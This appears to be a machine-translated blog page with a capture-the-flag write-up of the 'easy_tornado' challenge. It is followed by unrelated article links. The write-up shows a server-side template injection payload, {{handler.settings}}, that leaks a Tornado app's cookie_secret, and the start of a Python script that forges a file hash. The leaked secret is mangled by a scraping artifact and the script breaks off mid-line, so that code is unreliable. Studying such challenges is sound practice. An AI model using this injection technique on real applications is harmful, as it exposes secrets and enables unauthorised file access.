当前位置:网站首页>Vulnerability recurrence easy_ tornado
Vulnerability recurrence easy_ tornado
2022-07-07 08:10:00 【_ s1mple】
[ Environmental Science ]
windows
[ Tools ]
Firefox
[ step ]
tornado yes python One of them web Application framework .
Got the title and found three documents :
flag.txt
/flag.txt
flag in /fllllllllllllagFind out flag stay /fllllllllllllag In the document ;
welcome.txt
/welcome.txt
renderrender yes python A rendering function in , Render variables into the template , That is, different pages can be formed by passing different parameters .
hints.txt
/hints.txt
md5(cookie_secret+md5(filename))filehash=md5(cookie_secret+md5(filename)) Now? filename=/fllllllllllllag, Just need to know cookie_secret Can access flag.
After the test, I found another one error Interface , The format is /error?msg=Error, It is suspected that there is a server-side template injection attack (SSTI)
Try /error?msg={ {datetime}} stay Tornado In the front-end page template ,datetime It's pointing python in datetime This module ,Tornado Some object aliases are provided to quickly access objects , You can refer to Tornado Official documents
Find... By looking up the documentation cookie_secret stay Application object settings Properties of the , Also found that self.application.settings There's an alias
RequestHandler.settings
An alias for self.application.settings.handler To handle the current page RequestHandler object , RequestHandler.settings Point to self.application.settings, therefore handler.settings Point to RequestHandler.application.settings.
structure payload obtain cookie_secret
/error?msg={
{handler.settings}}
'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'Calculation filehash value :
import hashlib
def md5(s):
md5 = hashlib.md5()
md5.update(s)
return md5.hexdigest()
def filehash():
filename = '/fllllllllllllag'
cookie_secret = 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]
Linux server development, redis source code storage principle and data model
Thinkcmf6.0安装教程
Record a stroke skin bone error of the skirt
buureservewp(2)
Avatary的LiveDriver试用体验
央视太暖心了,手把手教你写HR最喜欢的简历
Content of string
【数字IC验证快速入门】15、SystemVerilog学习之基本语法2(操作符、类型转换、循环、Task/Function...内含实践练习)
Codeforce c.strange test and acwing
【數字IC驗證快速入門】15、SystemVerilog學習之基本語法2(操作符、類型轉換、循環、Task/Function...內含實踐練習)
随机推荐
数据库实时同步利器——CDC(变化数据捕获技术)
青龙面板--整理能用脚本
JS quick start (I)
海信电视开启开发者模式
json 数据展平pd.json_normalize
[quickstart to Digital IC Validation] 15. Basic syntax for SystemVerilog Learning 2 (operator, type conversion, loop, Task / Function... Including practical exercises)
Introduction à l'objet blob
青龙面板--花花阅读
UnityHub破解&Unity破解
LeetCode简单题之判断一个数的数字计数是否等于数位的值
The principle and implementation of buffer playback of large video files
Find the mode in the binary search tree (use medium order traversal as an ordered array)
C language queue
Network learning (II) -- Introduction to socket
青龙面板-今日头条
调用 pytorch API完成线性回归
ROS bridge notes (05) - Carla_ ackermann_ Control function package (convert Ackermann messages into carlaegovehiclecontrol messages)
Linux server development, redis protocol and asynchronous mode
[quick start of Digital IC Verification] 17. Basic grammar of SystemVerilog learning 4 (randomization)
央视太暖心了,手把手教你写HR最喜欢的简历